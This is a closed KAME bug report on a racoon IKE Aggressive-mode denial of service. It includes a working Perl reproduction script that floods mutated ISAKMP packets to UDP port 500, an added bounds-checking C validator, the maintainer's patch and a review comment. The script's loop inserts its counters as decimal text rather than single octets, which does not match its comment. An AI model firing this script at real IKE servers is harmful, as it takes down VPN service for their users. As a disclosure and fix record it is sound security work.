- Confidential: no
- Severity: critical
- Priority: high
- Responsible: sakane@kame.net
- State: closed
- Class: sw-bug
- Submitter-Id: unknown
- Arrival-Date: Wed Dec 03 02:00:01 +0900 2003
- Closed-Date: Mon Mar 28 19:46:27 +0900 2005
- Last-Modified: Mon Mar 28 19:46:27 +0900 2005
- Originator: John Lampe jwlampe@nessus.org
- Release: racoon package version 20011215a
- Organization: Nessus
- Environment: FreeBSD f00dikator 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sun Nov 30 23:43:55 EST 2003 jwlampe@f00dikator:/usr/obj/usr/src/sys/JWL_IPSEC i386
- Description:
While testing IKE/IPSEC implementations with the Nessus security scanner, I ran across this problem with racoon. We (Tenable Network Security) would like to include a vulnerability check for this bug in Nessus. Please advise when the bug is corrected and where the new release may be found (jwlampe@nessus.org).

Within the IKE protocol, there is a special field reserved for "Security Association Next Payload" and another field which is marked by the working group as 'RESERVED'. When a client uses the 'Aggressive' key exchange mode and inserts obviously bogus information into these fields (either separately or in tandem), the Racoon server will instantly go into an infinite loop, drop all existing connections, and take up an inordinate amount of system resources. The error displayed to console is (#82).
- How-To-Repeat:
The following perl script will reproduce the errors named above.
#!/usr/bin/perl
# Sends the mutated Aggressive-mode ISAKMP messages described above to UDP port 500.
use Socket;
$|=1;
$port = 500;
$host = shift || die "Need an IP";
# ISAKMP header: initiator cookie, zero responder cookie, Next Payload = SA,
# version 1.0, exchange type 4 (Aggressive), flags, message ID, length 0x017b.
$outer1 = "\xFF\x00\xFE\x01\xFD\x02\xFC\x03\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x04\x00\x00\x00\x00\x00\x00\x00\x01\x7B";
# Rest of the message, from the SA payload length octets (0x0080) onward:
# SA proposal and transforms, a KE payload, and a trailing payload.
$outer2 =
  "\x00\x80\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x74\x01\x01\x00\x01\x03\x00\x00\x24\x01\x01\x00\x00\x80\x01\x00\x05\x80" .
  "\x02\x00\x02\x80\x04\x00\x02\x80\x03\xFD\xE9\x80\x0B\x00\x01\x00\x0C\x00\x04\x00\x20\xC4\x9B\x03\x00\x00\x24\x02\x01\x00\x00\x80" .
  "\x01\x00\x05\x80\x02\x00\x02\x80\x04\x00\x02\x80\x03\xFD\xE9\x80\x0B\x00\x01\x00\x0C\x00\x04\x00\x20\xC4\x9B\x00\x00\x00\x24" .
  "\x03\x01\x00\x00\x80\x01\x00\x05\x80\x02\x00\x02\x80\x04\x00\x02\x80\x03\xFD\xE9\x80\x0B\x00\x01\x00\x0C\x00\x04\x00\x20\xC4" .
  "\x9B\x0A\x00\x00\x88\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19" .
  "\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\x2E\x2F\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39" .
  "\x3A\x3B\x3C\x3D\x3E\x3F\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58" .
  "\x59\x5A\x5B\x5C\x5D\x5E\x5F\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77" .
  "\x78\x79\x7A\x7B\x7C\x7D\x7E\x7F\x80\x81\x82\x83\xA4\x00\x00\x56\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E" .
  "\x0F\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1A\x1B\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2A\x2B\x2C\x2D\x2E" .
  "\x2F\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3A\x3B\x3C\x3D\x3E\x3F\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D" .
  "\x4E\x4F\x50\x51\x52";
$fuzzy1 = 4; # Security Association Next Payload
$fuzzy2 = 0; # RESERVED
# The loop counters land in the SA payload's Next Payload and RESERVED positions.
for ($var1 = $fuzzy1; $var1 < 15; $var1++) {
  for ($var2 = $fuzzy2; $var2 <= 128; $var2++) {
    $req = $outer1 . $var1 . $var2 . $outer2;
    blast_udp($req);
  }
}
# Send one message to $host:$port over UDP and print a progress dot.
sub blast_udp {
  my $msg = shift;
  print ".";
  $ip = inet_aton($host) or die "no host: $host";
  $paddr = sockaddr_in($port, $ip);
  $proto = getprotobyname('udp');
  socket(SOCK, PF_INET, SOCK_DGRAM, $proto) or die "socket: $!";
  connect(SOCK, $paddr) or die "connect: $!";
  send(SOCK, $msg, 0);
  close(SOCK);
}
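The octets the report names, Next Payload and RESERVED, together with the length octets that the fix quoted in the audit trail below bounds, all sit in the ISAKMP generic payload header (RFC 2408 section 3.2). As an added example, not code from this report, from racoon or from tcpdump, the C program below walks an ISAKMP payload chain and refuses to advance on any generic header whose length is below 4 or above 0x1000, runs past the datagram, or carries a non-zero RESERVED octet; unknown payload types are skipped by length rather than rejected. The sample packet, the 0x1000 ceiling (borrowed from the quoted fix), the 64-payload cap and the helper names are constructed assumptions for this example.

```c
/*
 * Added example: a bounds-checked walk over an ISAKMP (RFC 2408) payload
 * chain. Not code from this report, racoon or tcpdump. The sample packet,
 * the 0x1000 ceiling (taken from the fix quoted in the audit trail) and the
 * 64-payload cap are constructed for this example.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ISAKMP_HDR_LEN      28      /* fixed ISAKMP header, RFC 2408 section 3.1 */
#define ISAKMP_GEN_LEN       4      /* generic payload header: next, reserved, length */
#define ISAKMP_MAX_PAYLOAD   0x1000 /* same ceiling as the audit-trail fix */
#define ISAKMP_MAX_PAYLOADS  64     /* hypothetical cap on chain length */

enum walk_result {
    WALK_OK = 0,
    WALK_BAD_ARG,        /* caller error in the patch helper */
    WALK_SHORT_PACKET,   /* datagram shorter than the fixed header */
    WALK_HDR_LENGTH,     /* header Length field disagrees with the datagram size */
    WALK_BAD_LENGTH,     /* payload length below 4 or above 0x1000 */
    WALK_TRUNCATED,      /* payload length runs past the end of the datagram */
    WALK_BAD_RESERVED,   /* RESERVED octet not zero (RFC 2408 section 5.2) */
    WALK_TOO_MANY        /* chain longer than the cap */
};

static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t get32(const uint8_t *p) { return ((uint32_t)get16(p) << 16) | get16(p + 2); }

/* Validate every generic header before using its length to advance.
 * On WALK_OK, *count (if non-NULL) receives the number of payloads. */
enum walk_result isakmp_walk(const uint8_t *pkt, size_t len, unsigned *count)
{
    if (len < ISAKMP_HDR_LEN) return WALK_SHORT_PACKET;
    if (get32(pkt + 24) != len) return WALK_HDR_LENGTH;
    unsigned np = pkt[16];               /* Next Payload of the fixed header */
    size_t off = ISAKMP_HDR_LEN;
    unsigned n = 0;
    while (np != 0) {                    /* 0 (NONE) terminates the chain */
        if (n == ISAKMP_MAX_PAYLOADS) return WALK_TOO_MANY;
        if (len - off < ISAKMP_GEN_LEN) return WALK_TRUNCATED;
        const uint8_t *gen = pkt + off;
        uint16_t plen = get16(gen + 2);
        /* A length under 4 can never move off forward: that is the
         * infinite-loop shape the report describes. */
        if (plen < ISAKMP_GEN_LEN || plen > ISAKMP_MAX_PAYLOAD) return WALK_BAD_LENGTH;
        if (plen > len - off) return WALK_TRUNCATED;
        if (gen[1] != 0) return WALK_BAD_RESERVED;
        np = gen[0];                     /* unknown types are skipped by length */
        off += plen;
        n++;
    }
    if (count) *count = n;
    return WALK_OK;
}

/* Convenience: number of payloads, or the negated walk_result on error. */
int isakmp_payload_count(const uint8_t *pkt, size_t len)
{
    unsigned n = 0;
    enum walk_result r = isakmp_walk(pkt, len, &n);
    return r == WALK_OK ? (int)n : -(int)r;
}

/* Copy pkt, overwrite the octet at 'at', and walk the result: the same
 * single-octet mutation the report applies to Next Payload and RESERVED. */
enum walk_result isakmp_walk_patched(const uint8_t *pkt, size_t len, size_t at, uint8_t val)
{
    uint8_t buf[512];
    if (len > sizeof buf || at >= len) return WALK_BAD_ARG;
    memcpy(buf, pkt, len);
    buf[at] = val;
    return isakmp_walk(buf, len, NULL);
}

/* Constructed 48-byte Aggressive-mode packet: header, SA payload, NONCE payload. */
static const uint8_t sample_pkt[48] = {
    0xFF,0x00,0xFE,0x01,0xFD,0x02,0xFC,0x03,   /* initiator cookie */
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,   /* responder cookie */
    0x01,0x10,0x04,0x00,                       /* next=SA(1), version 1.0, aggressive, flags */
    0x00,0x00,0x00,0x00,                       /* message ID */
    0x00,0x00,0x00,0x30,                       /* length = 48 */
    0x0A,0x00,0x00,0x0C,                       /* SA: next=NONCE(10), reserved, length 12 */
    0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x01,  /* DOI = IPsec, situation = identity only */
    0x00,0x00,0x00,0x08,                       /* NONCE: next=NONE, reserved, length 8 */
    0xDE,0xAD,0xBE,0xEF                        /* nonce data */
};

int main(void)
{
    printf("intact packet: %d payloads\n", isakmp_payload_count(sample_pkt, sizeof sample_pkt));
    printf("SA length 0: result %d\n", isakmp_walk_patched(sample_pkt, sizeof sample_pkt, 31, 0x00));
    printf("RESERVED 0x40: result %d\n", isakmp_walk_patched(sample_pkt, sizeof sample_pkt, 29, 0x40));
    return 0;
}
```

The case worth remembering when writing a length guard is a value of 1 to 3: it passes a check that only rejects zero or oversize lengths, yet it is shorter than the generic header itself and never moves the cursor, which is the loop shape the report describes. isakmp_walk_patched repeats a single-octet mutation on a copy so the rejecting code path for each field (length, RESERVED, header Length, Next Payload) can be observed without sending anything.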
- Audit-Trail:
From: Shoichi Sakane <sakane@kame.net>
To: jwlampe@nessus.org
Cc: kame-bugs@kame.net
Subject: Re: fbsd4/555: DoS vulnerability in Racoon
Date: Fri, 02 Apr 2004 16:58:49 +0900
> Wow, that was quick. Thanks. Any news on bug #fbsd4/555?
there was a problem in print-isakmp.c of tcpdump. I fixed it in the repository. Could you check if racoon does not crash if you can test with the patch?
===
Index: print-isakmp.c
===================================================================
RCS file: /cvsroot/kame/kame/kame/kame/tcpdump/print-isakmp.c,v
retrieving revision 1.17
retrieving revision 1.18
diff -r1.17 -r1.18
> if (ntohs(ext->len) > 0x1000 || ntohs(ext->len) == 0) {
> printf("invalid length=%ud", ntohs(ext->len));
> cp = ep + 1;
> break;
> }
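Review bot: the new guard on `ext->len` rejects 0 and anything above 0x1000 but still lets lengths 1 through 3 through, which are shorter than the generic payload header the length is supposed to cover; suggest tightening the lower bound to `ntohs(ext->len) < sizeof(*ext)` (or the generic-header size the file uses) so those are rejected on the same path. Separately, the format in `printf("invalid length=%ud", ntohs(ext->len))` prints the value with `%u` followed by a literal `d`; `%u` alone is intended.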
State-Changed-From-To: open->feedback
State-Changed-By: sakane
State-Changed-When: Fri Apr 2 17:05:52 JST 2004
State-Changed-Why:
fixed the problem
Responsible-Changed-From-To: core->sakane
Responsible-Changed-By: sakane
Responsible-Changed-When: Fri Apr 2 17:05:52 JST 2004
Responsible-Changed-Why:
my responsibility
State-Changed-From-To: feedback->closed
State-Changed-By: suz
State-Changed-When: Mon Mar 28 19:46:01 JST 2005
State-Changed-Why:
the fix has been committed a long time ago, and the originator does not reply to it
- Unformatted:
>Quarter:
>Keywords:
>Date-Required: